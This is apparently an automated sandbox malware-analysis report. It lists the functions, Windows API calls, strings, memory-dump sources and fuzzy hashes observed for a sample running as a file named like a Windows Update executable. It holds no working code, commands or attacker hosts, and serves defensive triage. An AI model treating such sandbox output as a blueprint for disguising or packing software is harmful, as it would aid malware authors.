Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Unload
String ID:
API String ID: 3485584074-0
Opcode ID: c907b8f7601954ef58b4e988eba2dc7536efaeb1a99efda86d5778dc0492c16c
Instruction ID: b97b2a9ecab8e95a6f1aee9c8ca93a824c27ee0ed117ec9d3ea2211f102471f4
Opcode Fuzzy Hash: c907b8f7601954ef58b4e988eba2dc7536efaeb1a99efda86d5778dc0492c16c
Instruction Fuzzy Hash:

Function 00A197A6 Relevance: 1.5, APIs: 1, Instructions: 3filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL ref: 00A197A7

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: de41231265badbf803c2ee5e705c5bf7a521e56d635e5efce78eab7eadf26aae
Instruction ID: 9432402e7a9b4c16e93516227f6ebe297f14446baaae1c4927d1e31f10a52577
Opcode Fuzzy Hash: de41231265badbf803c2ee5e705c5bf7a521e56d635e5efce78eab7eadf26aae
Instruction Fuzzy Hash:

Analysis Process: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exePID: 4068, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	22.2%
Signature Coverage:	0%
Total number of Nodes:	203
Total number of Limit Nodes:	3

Executed Functions

Function 00A299DC Relevance: 1.5, APIs: 1, Instructions: 44filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00A29A24

Memory Dump Source

Source File: 0000000E.00000002.2357048192.0000000000A26000.00000040.00000001.01000000.0000000B.sdmp, Offset: 009B0000, based on PE: true

Associated: 0000000E.00000002.2357014219.00000000009B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.00000000009C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.00000000009CD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A01000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A2C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000AF7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B01000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B08000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B15000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B17000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B1E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B23000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B44000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B50000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B55000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B5D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B66000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B6A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C45000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C48000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C61000.00000040.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_9b0000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e4824a42b8e25293820d6be86b46158b32ce7c138603fcd661a0d95aa50e5b33
Instruction ID: 10599cf3d8d1b5c1ede74616bdee765e942754d0465d2900928519f3744dfe77
Opcode Fuzzy Hash: e4824a42b8e25293820d6be86b46158b32ce7c138603fcd661a0d95aa50e5b33
Instruction Fuzzy Hash: 94F091B65002597FD714DE8ADCC4DA77B6CEB8D7A4B444415F71897101C230AD518770

Function 00A29974 Relevance: 1.5, APIs: 1, Instructions: 26filenativeCOMMON

Download Yara Rule

APIs

NtSetInformationFile.NTDLL(?,?,?,?,?), ref: 00A2999B

Memory Dump Source

Source File: 0000000E.00000002.2357048192.0000000000A26000.00000040.00000001.01000000.0000000B.sdmp, Offset: 009B0000, based on PE: true

Associated: 0000000E.00000002.2357014219.00000000009B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.00000000009C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.00000000009CD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A01000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A2C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000AF7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B01000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B08000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B15000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B17000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B1E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B23000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B44000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B50000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B55000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B5D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B66000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B6A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C45000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C48000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C61000.00000040.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_9b0000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID: FileInformation
String ID:
API String ID: 4253254148-0
Opcode ID: afabb0f23454a06752297e3cc741cf4e16a6db8a0745e292da31ce17a0f9ccf2
Instruction ID: 027ca49738e1e4e0eb7fbdb874e3ea479c1c3bc4a456132494475242adb27229
Opcode Fuzzy Hash: afabb0f23454a06752297e3cc741cf4e16a6db8a0745e292da31ce17a0f9ccf2
Instruction Fuzzy Hash: 4AE0ECB25042647FE72C575EAC0DDA77F6CDBD6BB1F04446DB508A3110C661AC80C6B0

Function 00A29958 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL ref: 00A2996B

Memory Dump Source

Source File: 0000000E.00000002.2357048192.0000000000A26000.00000040.00000001.01000000.0000000B.sdmp, Offset: 009B0000, based on PE: true

Associated: 0000000E.00000002.2357014219.00000000009B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.00000000009C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.00000000009CD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A01000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A2C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000AF7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B01000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B08000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B15000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B17000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B1E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B23000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B44000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B50000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B55000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B5D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B66000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B6A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C45000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C48000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C61000.00000040.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_9b0000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d4ec6f7fb01cc2aaf2d995b96e1417b604f62c5ceb2d01a9791ddc5e2a4a7344
Instruction ID: 1481e78aa76db3a7d63cc27372099d31462a981cd2ca5bc3b9ee4e440c512c29
Opcode Fuzzy Hash: d4ec6f7fb01cc2aaf2d995b96e1417b604f62c5ceb2d01a9791ddc5e2a4a7344
Instruction Fuzzy Hash: A2B092B09021502ADF0E97FC6C0D746698C6BA2302F0488A4B215F21B4CE244580D760

Function 00A2996A Relevance: 1.5, APIs: 1, Instructions: 3nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL ref: 00A2996B

Memory Dump Source

Source File: 0000000E.00000002.2357048192.0000000000A26000.00000040.00000001.01000000.0000000B.sdmp, Offset: 009B0000, based on PE: true

Associated: 0000000E.00000002.2357014219.00000000009B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.00000000009C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.00000000009CD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A01000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A2C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000AF7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B01000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B08000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B15000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B17000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B1E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B23000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B44000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B50000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B55000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B5D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B66000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B6A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C45000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C48000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C61000.00000040.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_9b0000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 1645c620cc5dad47a2465641aa1cb02141eb359a77fe1cc1fe41ff0bafad744f
Instruction ID: 22eba22e7a44010fd91feccc12bdd4922fbbf8774a4325c5df2dc05293f92859
Opcode Fuzzy Hash: 1645c620cc5dad47a2465641aa1cb02141eb359a77fe1cc1fe41ff0bafad744f
Instruction Fuzzy Hash:

Function 00B505B4 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAddAtomA.KERNEL32(?), ref: 00B50640

Strings

ControlOfs, xrefs: 00B505F1
WndProcPtr, xrefs: 00B50606
Delphi, xrefs: 00B505DC
Enigma, xrefs: 00B5062B

Memory Dump Source

Source File: 0000000E.00000002.2357048192.0000000000B50000.00000040.00000001.01000000.0000000B.sdmp, Offset: 009B0000, based on PE: true

Associated: 0000000E.00000002.2357014219.00000000009B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.00000000009C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.00000000009CD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A01000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A26000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A2C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000AF7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B01000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B08000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B15000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B17000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B1E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B23000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B44000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B55000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B5D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B66000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B6A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C45000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C48000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C61000.00000040.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_9b0000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID: AtomGlobal
String ID: ControlOfs$Delphi$Enigma$WndProcPtr
API String ID: 2189174293-1257653096
Opcode ID: 1dd52d97ec130323e032cec8c461423a2c9077366a7d3d3af280d80c95c168fc
Instruction ID: 7336b3a18282359a734f74d263731a37ebb1380db4c9046ef87b6db4aeb2aa06
Opcode Fuzzy Hash: 1dd52d97ec130323e032cec8c461423a2c9077366a7d3d3af280d80c95c168fc
Instruction Fuzzy Hash: C411A9313103056BEB10BA708CA2B6E77D9DBCA301F5094F4FD019B286EE35DE2A9621

Function 035700B8 Relevance: 5.1, Strings: 4, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

E]xk^, xrefs: 03570140, 03570145
2Ll, xrefs: 03570154
2Ll, xrefs: 035701A8
5]xk^, xrefs: 03570194, 03570199

Memory Dump Source

Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID:
String ID: 2Ll$2Ll$5]xk^$E]xk^
API String ID: 0-606831587
Opcode ID: 6838a7810247bbc2b601a934a4e589f82a4bb260f72147a5867974423addcb21
Instruction ID: 3cf3a8788106a1ee3174ca4215a3b647c6f178c1c364eabbbc2c77a704132ee3
Opcode Fuzzy Hash: 6838a7810247bbc2b601a934a4e589f82a4bb260f72147a5867974423addcb21
Instruction Fuzzy Hash: 9D31D1307053445FD714EBB59822FAE7BA6ABC2608B0484AED0058F791CF35880AC792

Function 03570118 Relevance: 5.1, Strings: 4, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

E]xk^, xrefs: 03570140, 03570145
2Ll, xrefs: 03570154
2Ll, xrefs: 035701A8
5]xk^, xrefs: 03570194, 03570199

Memory Dump Source

Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID:
String ID: 2Ll$2Ll$5]xk^$E]xk^
API String ID: 0-606831587
Opcode ID: 41d721a93f69046011d0a939d1beddf02f2082ab8b1b0dff3bc1ce388b208bd6
Instruction ID: 4432ac5da2d71a665aa55a957f5e6c217e1eb22f048c5bc0b761f29741fe90a1
Opcode Fuzzy Hash: 41d721a93f69046011d0a939d1beddf02f2082ab8b1b0dff3bc1ce388b208bd6
Instruction Fuzzy Hash: 5711C2347052504FC714EB7AE462EAE77A7ABD2249744846DD0068FB55CF798C0ACBE2

Function 03570AE1 Relevance: 3.0, Strings: 2, Instructions: 500
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\OLl, xrefs: 03570B65
2Ll, xrefs: 03570F0E

Memory Dump Source

Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID:
String ID: \OLl$2Ll
API String ID: 0-1463305755
Opcode ID: 2acbc879e8c4f3625432d3225f4474141bae04af4f12426f9614db34b1924ddf
Instruction ID: e2f4b7f0ac6b549f9383eaff55f2808e19a38c9e0817682574dbf1a7f8c33178
Opcode Fuzzy Hash: 2acbc879e8c4f3625432d3225f4474141bae04af4f12426f9614db34b1924ddf
Instruction Fuzzy Hash: BE322A34A10219CFDB24DF74D855BEDBBB2BB48308F1045A9D40AAB7A4DB399E85CF41

Function 035702C0 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

:@%l, xrefs: 0357036D

Memory Dump Source

Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID:
String ID: :@%l
API String ID: 0-1656731533
Opcode ID: 71f27bb3139747ab392b1a77b87b94e2ca99859e57f87f208803f9b5ba122965
Instruction ID: ccd91ae5b1f9283a13dc81041051f21ec7c2408bc7dc8c32ad7fbaed05b4d655
Opcode Fuzzy Hash: 71f27bb3139747ab392b1a77b87b94e2ca99859e57f87f208803f9b5ba122965
Instruction Fuzzy Hash: ED31E574B102128FDB04EB75E812BBE37A6AB88208F504039D405D77A5DF3D8D1BCBA1

Function 00B50540 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00B5056B

Memory Dump Source

Source File: 0000000E.00000002.2357048192.0000000000B50000.00000040.00000001.01000000.0000000B.sdmp, Offset: 009B0000, based on PE: true

Associated: 0000000E.00000002.2357014219.00000000009B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.00000000009C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.00000000009CD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A01000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A26000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000A2C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000AF7000.00000040.00000001.01000000.0000000B.sdmpDownload File
